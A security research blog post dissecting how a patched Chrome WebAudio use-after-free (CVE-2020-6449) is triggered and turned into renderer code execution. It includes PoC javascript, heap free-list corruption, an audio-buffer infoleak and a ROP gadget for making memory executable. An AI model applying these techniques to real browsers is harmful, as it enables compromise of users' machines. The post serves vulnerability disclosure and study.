October 27, 2020

Exploiting a textbook use-after-free in Chrome

Man Yue Mo

In March 2020, I reported this use-after-free (UAF) vulnerability in the WebAudio module of Chrome. This is a UAF of non-garbage-collected objects, which are allocated by the PartitionAlloc memory allocator. In blink (which WebAudio is a part of), heap objects are allocated with different memory allocators depending on their types. For example, most garbage-collected objects are allocated by Oilpan, while non-garbage-collected objects are allocated by PartitionAlloc (with the exception of the backing stores of ArrayBuffer and String, which are allocated in PartitionAlloc even though the objects themselves are garbage collected).

In 2019, two of the high profile "exploited-in-the-wild" vulnerabilities in Chrome were UAFs of PartitionAlloc objects in blink. One was CVE-2019-5786, reported by Clement Lecigne of Google's Threat Analysis Group, and the other was CVE-2019-13720, aka WizardOpium, reported by Anton Ivanov and Alexey Kulaev of Kaspersky Labs.

Much of the difficulty in exploiting this kind of vulnerability lies with PartitionAlloc, which separates primitive containers (String, Vectors, ArrayBuffers etc.) from normal, 'executable' objects: primitive containers are allocated in the Buffer and ArrayBuffer partitions, whereas normal objects are allocated in the Fast partition. First, this separation makes it difficult to use a memory corruption in the ArrayBuffer or Buffer partitions to hijack control flow. Second, it makes it difficult to use a memory corruption in the Fast partition to create fake objects with controlled data in the ArrayBuffer or Buffer partitions, because the write primitive is likely to be very limited there. In the two bugs mentioned previously, the UAFs are in the ArrayBuffer partition and the challenge is to break out of the ArrayBuffer partition. The exploits of those bugs are well documented and can be found here for CVE-2019-5786 and here for WizardOpium. A more comprehensive write up of the technique to exploit PartitionAlloc this way can be found here.

In this post, however, we face the opposite challenge, which is to go from a UAF in the Fast partition to get RCE. I'll use CVE-2020-6449 as an example to show this, but the technique itself is more general and is applicable to other situations where a UAF occurs with Fast partition objects.

The vulnerability

The precise details and root cause analysis of the vulnerability can be found in the above link and the Chrome bug ticket, so I'll only summarize the details of the bug here. I'll also assume that readers are already familiar with the details of WebAudio from my previous post.

The bug happens in the DeferredTaskHandler::BreakConnections function:

void DeferredTaskHandler::BreakConnections() {
  ...
  wtf_size_t size = finished_source_handlers_.size();
  if (size > 0) {
    for (auto* finished : finished_source_handlers_) {
      // Break connection first and then remove from the list because that can
      // cause the handler to be deleted.
      finished->BreakConnectionWithLock();
      active_source_handlers_.erase(finished);
    }
    finished_source_handlers_.clear();
  }
}

Normally, active_source_handlers_ is responsible for keeping the objects behind the raw pointers in finished_source_handlers_ alive. Because finished is only erased from active_source_handlers_ after it is used, this is normally safe. However, if we somehow manage to clear active_source_handlers_ without clearing finished_source_handlers_, then finished may already have been freed by the time the above function uses it, which causes a UAF.

Triggering the bug

To understand how to trigger this bug, it's worth taking a look at a closely related bug that I reported before CVE-2020-6449. In that bug, BreakConnections looked like this:

void DeferredTaskHandler::BreakConnections() {
  ...
  wtf_size_t size = finished_source_handlers_.size();
  if (size > 0) {
    for (auto* finished : finished_source_handlers_) {
      active_source_handlers_.erase(finished);          //<-- finished is now free'd
      finished->BreakConnectionWithLock();              //<-- UaF
    }
    finished_source_handlers_.clear();
  }
}

As we can see in the above snippet, finished is erased from active_source_handlers_ before it is used. To trigger this bug, we just need to ensure that active_source_handlers_ is the only thing keeping the handlers in finished_source_handlers_ alive at this point. To trigger CVE-2020-6449, we also need to clear active_source_handlers_ in advance.
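The difference between the two orderings can be sketched with a toy model. This is not Chrome code: the class names are hypothetical, "freed" is just a flag, and the model assumes the javascript node has already been collected so that the active set is the only owner.

```javascript
// Toy model only: "freed" is a flag, not real memory management.
class Handler {
  constructor(name) {
    this.name = name;
    this.freed = false;
    this.connectionRefCount = 1;
  }
  breakConnectionWithLock() {
    if (this.freed) throw new Error(`use-after-free of ${this.name}`);
    this.connectionRefCount--;
  }
}

class TaskHandlerModel {
  constructor() {
    this.active = new Set(); // models active_source_handlers_ (owning)
    this.finished = [];      // models finished_source_handlers_ (raw pointers)
  }
  // Dropping the last owning reference "frees" the handler.
  eraseActive(handler) {
    if (this.active.delete(handler)) handler.freed = true;
  }
  clearActive() {
    for (const handler of [...this.active]) this.eraseActive(handler);
  }
  // Ordering from the earlier bug: erase first, then use.
  breakConnectionsEraseFirst() {
    for (const handler of this.finished) {
      this.eraseActive(handler);
      handler.breakConnectionWithLock();
    }
    this.finished = [];
  }
  // Ordering relevant to CVE-2020-6449: use first, then erase.
  breakConnectionsUseFirst() {
    for (const handler of this.finished) {
      handler.breakConnectionWithLock();
      this.eraseActive(handler);
    }
    this.finished = [];
  }
}

function runScenario(order, clearActiveFirst) {
  const model = new TaskHandlerModel();
  const handler = new Handler("ConstantSourceHandler");
  model.active.add(handler);
  model.finished.push(handler);
  if (clearActiveFirst) model.clearActive();
  try {
    if (order === "eraseFirst") model.breakConnectionsEraseFirst();
    else model.breakConnectionsUseFirst();
    return "ok";
  } catch (e) {
    return e.message;
  }
}

console.log(runScenario("eraseFirst", false));
console.log(runScenario("useFirst", false));
console.log(runScenario("useFirst", true));
```

In this model, the use-first ordering only fails when the active set is emptied beforehand, which mirrors the extra step needed for CVE-2020-6449.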

As explained in the ticket, active_source_handlers_ and finished_source_handlers_ are related to the AudioScheduledSourceNode, which has two subclasses, the ConstantSourceNode and the OscillatorNode. When the start method of an AudioScheduledSourceNode is called, its AudioHandler gets added to active_source_handlers_. So for example, in the PoC for ticket 1057593, the lines

  let src = audioCtx.createConstantSource();
  src.start();

add the AudioHandler of src to active_source_handlers_. At this point, both the node src and active_source_handlers_ are responsible for keeping the AudioHandler alive. When stop is called on src, it schedules a stop event for src at time zero. This event is actually handled by the HandleStoppableSourceNode function, which adds the handler to finished_source_handlers_. At this point, we can suspend the audio and run some javascript by handling the promise:

  audioCtx.suspend((3 * 128)/3072.0).then(()=>{
    gc();
    audioCtx.resume();
  });

As the constantSource (the javascript handle of the ConstantSourceNode) is now stopped, there is nothing to keep it alive, and a call to garbage collection (gc) will collect and destroy it. After that, active_source_handlers_ is the only thing keeping the handler in finished_source_handlers_ alive. A call to audioCtx.resume will then reach BreakConnections and trigger the UAF.
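The suspend time used in the snippet above works out to a whole number of render quanta. The following sketch checks that arithmetic; the sample rate of 3072 is an assumption inferred from the 3072.0 divisor, and the helper names are made up for illustration.

```javascript
const RENDER_QUANTUM_FRAMES = 128; // Web Audio renders in blocks of 128 frames
const ASSUMED_SAMPLE_RATE = 3072;  // assumption: inferred from the 3072.0 divisor

// Time (in seconds) at which the given number of render quanta has elapsed.
function suspendTimeForQuanta(quanta, sampleRate) {
  return (quanta * RENDER_QUANTUM_FRAMES) / sampleRate;
}

// True when the time falls exactly on a render quantum boundary.
function isQuantumAligned(time, sampleRate) {
  const frames = time * sampleRate;
  return Number.isInteger(frames) && frames % RENDER_QUANTUM_FRAMES === 0;
}

const suspendTime = suspendTimeForQuanta(3, ASSUMED_SAMPLE_RATE);
console.log(suspendTime); // 0.125
console.log(isQuantumAligned(suspendTime, ASSUMED_SAMPLE_RATE)); // true
```

Under that assumption, the promise handler runs after exactly three render quanta, at a boundary between two blocks of audio processing.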

Now that we understand how to trigger the simple version of CVE-2020-6449, all that is needed is to add a step that clears active_source_handlers_ before we reach BreakConnections. The main difference here is that the only way to clear active_source_handlers_ is to destroy the javascript execution context, which basically means putting everything inside an iframe and then destroying it. The main file in the new PoC lives in the iframe and also adds a number of new nodes to the audio graph. For example, the onLoad method now creates about 2000 PannerNodes:

function onLoad() {
  startStop().then((audioCtx) => {
    audioCtx.suspend((3 * 128)/3072.0).then(()=>{
      //======new======
      let dest = audioCtx.createConstantSource();
      dest.start();
      for (let i = 1; i < 2000; i++) {
        dest = dest.connect(audioCtx.createPanner());
      }
      dest.connect(audioCtx.destination);
      //=====new end======
      ....
    });
    audioCtx.startRendering();
  });
}

The startStop method also adds an AudioWorkletNode. The main reason for creating the AudioWorkletNode and the PannerNodes is to control the timing between the audio thread, where BreakConnections runs, and the main thread, where active_source_handlers_ is cleared. They cause delays in the audio thread so that there is sufficient time to clear active_source_handlers_ before triggering the bug.

Exploiting the bug

In order to exploit this bug, I first need to replace the freed object with an object of similar size and hope that BreakConnectionWithLock does something "useful" in the context of the replacement object. In general, I'd like to have the following:

  1. When calling BreakConnectionWithLock in the context of the replaced object, I want to be able to deduce the location of a heap pointer and the address of a function or vtable etc. The latter will allow me to find the address of some loaded libraries and therefore the locations of rop gadgets within them. For example, if a pointer address is written to an integer field of the replaced object by BreakConnectionWithLock, then I'll be able to get some pointer addresses by reading out the integer field.
  2. After knowing these addresses, I'd like to be able to create an object that allows me to fake its vtable and have it point to the location of a rop gadget, which I know from 1. Then when I call the virtual function, it will execute the gadget of my choice. This can be achieved, for example, by creating a fake object using an ArrayBuffer or similar data structure so that I can fake the vtable with array entries.

So let's take a look at what BreakConnectionWithLock actually does:

void AudioHandler::BreakConnectionWithLock() {
  deferred_task_handler_->AssertGraphOwner();  //<---- No effect in release build
  connection_ref_count_--;

#if DEBUG_AUDIONODE_REFERENCES
  fprintf(stderr,
          "[%16p]: %16p: %2d: AudioHandler::BreakConnectionWitLock %3d [%3d] "
          "@%.15g\n",
          Context(), this, GetNodeType(), connection_ref_count_,
          node_count_[GetNodeType()], Context()->currentTime());
#endif

  if (!connection_ref_count_)
    DisableOutputsIfNecessary();  //<--- calls virtual function
}

I'm in a bit of luck with this one. The first line only has an effect in a debug build, so I get to avoid a pointer dereference that could cause a crash that is tricky to avoid.

The second line is also good. It decrements a counter, so it gives me a limited write primitive that is unlikely to crash. After that, it checks connection_ref_count_ and optionally calls DisableOutputsIfNecessary, which ends up making a virtual function call. At the moment, I'd like to avoid the path that calls a virtual function because, without any knowledge of the heap layout, it is likely to just end up in a crash.

In summary, so far we have:

  1. A UAF where the time between free and use can easily be controlled.
  2. A limited write primitive that decrements a field at a specific offset of the freed object by one.
  3. A possibility to make a virtual function call.

As we'll see later, one and two are all I need to exploit this bug.
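To make the decrement primitive concrete, here is a toy model of it acting on a replacement object. It assumes a 32-bit counter on a little-endian machine; the field offset, chunk size and pointer value are hypothetical and chosen only for illustration.

```javascript
// Hypothetical offset of connection_ref_count_ within the chunk.
const FIELD_OFFSET = 0x30;

// Models the two relevant steps of BreakConnectionWithLock on raw chunk bytes:
// decrement the 32-bit field, then report whether the virtual-call path would run.
function breakConnectionWithLockModel(chunk, fieldOffset) {
  const view = new DataView(chunk);
  const refCount = view.getInt32(fieldOffset, true) - 1;
  view.setInt32(fieldOffset, refCount, true);
  return refCount === 0; // true models calling DisableOutputsIfNecessary
}

// The replacement object stores a 64-bit pointer where the counter used to be.
const chunk = new ArrayBuffer(240);
const chunkView = new DataView(chunk);
const pointerBefore = 0x00005555deadb000n; // hypothetical heap pointer
chunkView.setBigUint64(FIELD_OFFSET, pointerBefore, true);

const tookVirtualCall = breakConnectionWithLockModel(chunk, FIELD_OFFSET);
const pointerAfter = chunkView.getBigUint64(FIELD_OFFSET, true);

console.log(tookVirtualCall);           // false
console.log(pointerAfter.toString(16)); // 5555deadafff
```

Because the low 32 bits of a typical heap pointer are far from 1, the counter does not reach zero, so the virtual-call path is skipped and the only effect is that the pointer moves back by one byte.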

Object replacement

The first step of a UAF exploit is usually to replace the freed object with a different object of similar size to cause a type confusion, and then try to create an infoleak from it. After that, we can trigger the bug again and replace the freed object with another fake object where we can fake a vtable and have it point to some rop gadgets, etc.

As mentioned before, the memory allocator used to allocate these objects is PartitionAlloc. From an exploit development point of view, the most important aspects of PartitionAlloc are:

  1. It is a bucket allocator that maintains a list of freed and allocated objects for each bucket. When an object is freed, it becomes the head of the free list in its bucket, while the previous head of the free list becomes the next free chunk. The next allocated object whose size falls in the same bucket takes the place of this most recently freed object. Within a bucket, all chunks are allocated contiguously.
  2. It has 4 different partitions, which separate most data containers (backing store of ArrayBuffer, Vector, String, etc.) from "normal" objects.

For now, we only need to care about point 1. I'll discuss point 2 a bit more later.
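The last-in, first-out behaviour described in point 1 can be sketched with a toy bucket. This is a simplified model, not PartitionAlloc itself: the class name, base address and slot count are hypothetical.

```javascript
// Toy bucket with a LIFO free list; addresses are plain numbers.
class BucketModel {
  constructor(base, slotSize, slotCount) {
    this.slotSize = slotSize;
    this.freeList = [];
    // Push in reverse so that the lowest address is handed out first,
    // which keeps consecutive allocations contiguous.
    for (let i = slotCount - 1; i >= 0; i--) {
      this.freeList.push(base + i * slotSize);
    }
  }
  alloc() {
    if (this.freeList.length === 0) throw new Error("bucket exhausted");
    return this.freeList.pop(); // take the head of the free list
  }
  free(address) {
    this.freeList.push(address); // the freed slot becomes the new head
  }
}

const bucket = new BucketModel(0x1000, 240, 4);
const victim = bucket.alloc();      // e.g. the object that will be freed
const neighbour = bucket.alloc();   // next contiguous slot
bucket.free(victim);                // the UAF target is released
const replacement = bucket.alloc(); // same-bucket allocation reuses the slot

console.log(replacement === victim); // true
```

This is why replacing the freed object is reliable: the next allocation from the same bucket lands exactly where the freed object used to be.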

The object that gets freed here is a subclass of AudioScheduledSourceHandler, which is either ConstantSourceHandler or OscillatorHandler. The sizes of these objects in the release build of 80.0.3987.137 on Linux (the last version before the bug was fixed) are 240 and 312 bytes respectively, which correspond to the bin sizes (225 - 240) and (289 - 320). It's fairly straightforward to find types that fall within these bins using CodeQL:

import cpp

from Type t
where t.getSize() > 225 and t.getSize() <= 240
select t
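The bin ranges quoted above can be reproduced with a small calculation. The sketch below assumes eight evenly spaced buckets per power-of-two range, which is a simplification of the real allocator; the function name is hypothetical.

```javascript
const BUCKETS_PER_ORDER = 8; // assumption: simplified model of the bucket layout

// Returns the inclusive range of sizes that share a bucket with `size`.
function bucketRange(size) {
  if (!Number.isInteger(size) || size < 16) {
    throw new RangeError("this sketch only handles integer sizes >= 16");
  }
  // Largest power of two strictly below `size` (so that exact powers of two
  // are treated as the top bucket of the range below them).
  let order = 1;
  while (order * 2 <= size - 1) order *= 2;
  const step = order / BUCKETS_PER_ORDER;
  const upper = Math.ceil(size / step) * step;
  return { lower: upper - step + 1, upper };
}

console.log(bucketRange(240)); // { lower: 225, upper: 240 }
console.log(bucketRange(312)); // { lower: 289, upper: 320 }
```

Under this model, ConstantSourceHandler (240 bytes) and OscillatorHandler (312 bytes) fall into the two ranges used in the query bounds.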

After looking through various types in the bins, the class BiquadDSPKernel looks the most promising. It can be created from javascript using the AudioContext::createBiquadFilter() function, and the field connection_ref_count_ in ConstantSourceHandler, which we are able to decrement in BreakConnectionWithLock, lines up with biquad_.a1_.allocation_ in its field biquad_, which is a pointer field in an AudioDoubleArray.

However, allocation_ is only used for creating aligned_data_ and is not used afterwards. This means that if we are to replace the freed ConstantSourceHandler with a BiquadDSPKernel, the value of biquad_.a1_.allocation_ after it is modified by BreakConnectionWithLock won't be used. So this is a dead end... or is it?

Corrupting free list, one step at a time

When I say the value of allocation_ is not used after we modified it as connection_ref_count_, this is not exactly true, because it will get freed when the AudioArray is destroyed.

What it means is that, when AudioArray is freed, allocation_ becomes the head of the free list. However, as we decreased its value by one, this pointer now overlaps with the previous chunk of memory, which may still be in use. While a one-byte overlap between the chunks may not be that useful, if we can repeatedly trigger this bug and have biquad_.a1_.allocation_ land on the same place, then we can decrease this pointer repeatedly and create a large enough overlap between two chunks to cause another type confusion. This can actually be achieved by simply triggering the bug and replacing the freed object with a BiquadDSPKernel each time. As PartitionAlloc will simply reuse the same chunks over and over again (allocation_ here lives in the bin of size 8 * 128 = 1024, which does not get used often), we are guaranteed to end up modifying the same allocation_ pointer every time. So for example, if I want to decrease the allocation_ pointer value by n, all I need to do is to make this change to the remove function here:

function remove() {
  let frame = document.getElementById("ifrm");
  frame.parentNode.removeChild(frame);

  if (counter < n) {
    //Trigger bug to move chunk backwards
    let biquad = audioCtx.createBiquadFilter();
    counter++;
    delete biquad;
    sleep(700);
    createIframe();
  }
}

The sleep here is just to make sure the objects get garbage collected. In the actual exploit, I have to trigger it 62 times, so it takes a couple of minutes to run.
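The cumulative effect of the repeated triggers is simple arithmetic, sketched below. The starting address is hypothetical, and the slot size is the bin size quoted in the text; only the count of 62 comes from the exploit.

```javascript
const SLOT_SIZE = 1024n; // bin size quoted in the text
const ROUNDS = 62;       // number of triggers used in the exploit

// Each trigger decrements the same allocation_ pointer by one.
function pointerAfterRounds(originalPointer, rounds) {
  let pointer = originalPointer;
  for (let i = 0; i < rounds; i++) pointer -= 1n;
  return pointer;
}

// Number of bytes at the start of the corrupted chunk that now belong
// to the chunk immediately before it.
function overlapWithPreviousSlot(originalPointer, corruptedPointer) {
  return originalPointer - corruptedPointer;
}

const originalPointer = 0x555500001c00n; // hypothetical slot address
const corruptedPointer = pointerAfterRounds(originalPointer, ROUNDS);
const overlap = overlapWithPreviousSlot(originalPointer, corruptedPointer);
const staysInPreviousSlot = overlap > 0n && overlap <= SLOT_SIZE;

console.log(corruptedPointer.toString(16)); // 555500001bc2
console.log(overlap);                       // 62n
```

After 62 rounds the first 62 bytes of whatever is allocated at the corrupted pointer alias the last 62 bytes of the previous chunk.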

So far, I have managed to corrupt the free list in the bin of size 1024 to cause overlaps between objects. I'll now use this to create an infoleak that will give me both the address of libchrome and the address of a heap pointer, which will allow me to create some controlled data at a known address.

Building an infoleak

In order to build an infoleak, I use the HRTFPanner class, which is of size 1152 and is in the same bin as the allocation_ field of AudioArray that I managed to move. Ideally, I would like to have an HRTFPanner allocated at the location of the corrupted allocation_ pointer so that the beginning of this HRTFPanner overlaps with the end of another object that occupies the previous chunk, as illustrated in the following figure.

When I then allocate the HRTFPanner, its vtable and the shared pointer field database_loader_ will map to the end of the object that occupies the previous chunk, so it'd be convenient if I can find an object whose fields can be read off easily in javascript to occupy this chunk. Looking through objects of different sizes, however, does not yield any obvious candidate for this previous chunk.

Moreover, as mentioned before, PartitionAlloc separates the allocations of data containers and normal objects. Whereas objects like HRTFPanner etc. are allocated in the Fast partition, data containers are allocated in the Buffer partition or the ArrayBuffer partition, so I can't just allocate a dynamically sized object like an ArrayBuffer in javascript, have it overlap with HRTFPanner and read the vtable etc. off its entries.

However, recall how I arrived here. I was using the allocation_ field of an AudioArray to corrupt the free list in the first place. This is an object in the Fast partition with an easily controllable size, and its contents may also be readable from javascript. While this seems like a good candidate to occupy the "previous chunk", there is a problem. AudioArray is only used internally as a buffer to store temporary audio data and does not interact with javascript directly. Worse still, in almost all use cases, it is used as a temporary buffer whose data gets overwritten before it can be read from javascript. So even if I can create an AudioArray and overwrite its buffer with the vtable and heap pointers from an overlapping HRTFPanner object, this data will most likely be overwritten before I get to read it.

Almost all the time, that is. There is one use case, in AudioDelayDSPKernel::Process, where the AudioFloatArray field buffer_ may not be fully overwritten before it gets returned to the user. This allows me to create a specially crafted DelayNode whose buffer_ gets overwritten by an HRTFPanner object once the free list is corrupted, and then retrieve it from the audio output:

  //Create a DelayDSPKernel whose buffer_ has the right size, which will be used to leak data.
  delay_leak = audioCtx.createDelay(0.0908);
  //3/3072 = 1./1024, need to divide by power of 2 to avoid rounding error when converting to double
  delay_leak.delayTime.value =  3 * 0.0009765625;
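The comment about dividing by a power of 2 can be checked directly. The sketch below only verifies the arithmetic; it assumes the delay time passes through a 32-bit float at some point, and the names are made up for illustration.

```javascript
const delayTime = 3 * 0.0009765625;

const checks = {
  // 0.0009765625 is exactly 2^-10, so it has an exact binary representation.
  isTwoToMinusTen: 0.0009765625 === 2 ** -10,
  // 3/3072 reduces to 1/1024, the same value.
  sameAsThreeOver3072: 3 / 3072 === 0.0009765625,
  // The chosen delay time survives a float32 round trip unchanged.
  exactInFloat32: Math.fround(delayTime) === delayTime,
  // Contrast: a nearby decimal value does not survive the round trip.
  decimalSurvives: Math.fround(0.003) === 0.003,
};

console.log(checks);
```

Because the delay time is a small multiple of a power of two, it corresponds to a whole number of frames with no rounding in either float width.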

Rendering an audio graph with this delay node will then enable me to read the vtable and the heap pointer for the database_loader_ field of an HRTFPanner object in the output.
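Reading pointers out of rendered audio amounts to reinterpreting pairs of 32-bit float samples as 64-bit integers. The following is a minimal sketch of that step under stated assumptions: the function name is hypothetical, the pointer values are made-up stand-ins for leaked data, and it is not taken from the exploit.

```javascript
// Reinterprets consecutive pairs of float32 samples as 64-bit values,
// using the platform's native byte order.
function floatsToPointers(samples) {
  if (samples.length % 2 !== 0) {
    throw new RangeError("need an even number of float32 samples");
  }
  // Byte-exact copy, so the result is aligned and independent of the source.
  const bytes = samples.buffer.slice(
    samples.byteOffset,
    samples.byteOffset + samples.byteLength
  );
  return Array.from(new BigUint64Array(bytes));
}

// Stand-ins for a vtable pointer and a heap pointer (hypothetical values).
const fakeLeak = new BigUint64Array([0x00005581a2b3c4d8n, 0x00007f10deadbe00n]);
// View the same bytes as four float samples, as rendered audio would expose them.
const asAudioSamples = new Float32Array(fakeLeak.buffer);

const decoded = floatsToPointers(asAudioSamples);
console.log(decoded.map((p) => "0x" + p.toString(16)));
```

Working on the raw bytes rather than on the numeric sample values avoids any loss from float conversions.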

Once I have these two pieces of information, the rest is easy. I just need to create a fake object using another AudioArray in the same bin as the ConstantSourceHandler with a vtable pointing to a rop gadget, then trigger the bug once more to call arbitrary functions with arbitrary arguments.

Another easy way is just to destroy delay_leak and allocate another AudioArray to overwrite the vtable of the HRTFPanner, and then use its virtual destructor to run code. This is actually what I ended up doing. By doing this, I don't even need the original UAF bug to call any virtual function.

In the end, I used the following gadget:

  //mov rax,QWORD PTR [rdi + 0x20]; <-- function call
  //mov rsi,QWORD PTR [rdi + 0x98]; <-- arg0
  //mov rdx,QWORD PTR [rdi + 0xa0]; <-- arg1
  //add rdi, 0x28 <--- arg2

which is roughly at the address of this symbol (which is just one of the callbacks that takes three arguments):

base::internal::Invoker<base::internal::BindState<void (*)(blink::KURL const&, base::WaitableEvent*, std::__1::unique_ptr<blink::WebGraphicsContext3DProvider, std::__1::default_delete<blink::WebGraphicsContext3DProvider> >*), blink::KURL, WTF::CrossThreadUnretainedWrapper<base::WaitableEvent>, WTF::CrossThreadUnretainedWrapper<std::__1::unique_ptr<blink::WebGraphicsContext3DProvider, std::__1::default_delete<blink::WebGraphicsContext3DProvider> > > >, void ()>::RunOnce(base::internal::BindStateBase*)

There are plenty of these callbacks in libchrome which basically give gadgets to call arbitrary functions with arbitrary arguments (idea taken from this post of Tim Becker, which is a great read), although trawling through them to find one with the right type can be tedious.
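To see what the quoted gadget reads, its four instructions can be emulated over a byte buffer. This is a toy emulator only: rdi is treated as an offset into the buffer rather than a real address, the stored values are hypothetical, and it assumes little-endian 64-bit loads.

```javascript
// Emulates the register effects of the four quoted instructions.
function emulateGadget(memory, rdi) {
  const view = new DataView(memory);
  return {
    rax: view.getBigUint64(rdi + 0x20, true), // mov rax, [rdi + 0x20]
    rsi: view.getBigUint64(rdi + 0x98, true), // mov rsi, [rdi + 0x98]
    rdx: view.getBigUint64(rdi + 0xa0, true), // mov rdx, [rdi + 0xa0]
    rdi: rdi + 0x28,                          // add rdi, 0x28
  };
}

// A buffer standing in for the object that rdi points to.
const memory = new ArrayBuffer(0x100);
const memoryView = new DataView(memory);
memoryView.setBigUint64(0x20, 0x1111n, true); // hypothetical function address
memoryView.setBigUint64(0x98, 0x2222n, true); // hypothetical argument
memoryView.setBigUint64(0xa0, 0x3333n, true); // hypothetical argument

const registers = emulateGadget(memory, 0);
console.log(registers);
```

The point of the model is that every value the gadget uses comes from fixed offsets in one object, so controlling that object's contents determines both the call target and its arguments.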

Using this gadget to call OS::SetPermissions allows me to change the page permissions of my controlled data to rwx, which allows me to run arbitrary shellcode in the renderer.

Conclusions

In this post I've gone through the details of exploiting CVE-2020-6449 and some common strategies and techniques involved in the exploit. We also saw how mitigations in the memory allocator made this bug more difficult to exploit. In the end, I was able to exploit the bug by simply decrementing a pointer field in a replaced object, which is a rather limited primitive. This shows that when the stars line up, even a limited (and probably not that rare) primitive like this can wreak havoc. Fortunately, with the sandbox architecture in Chrome, another sandbox escape bug is required to compromise Chrome. This shows how tackling security at multiple levels (sandboxing + quick bug fixing + bug finding) really helps in improving the security of Chrome.

The full exploit, with some setup notes, can be found here. I tested it against a symbol build of 80.0.3987.137 on Ubuntu.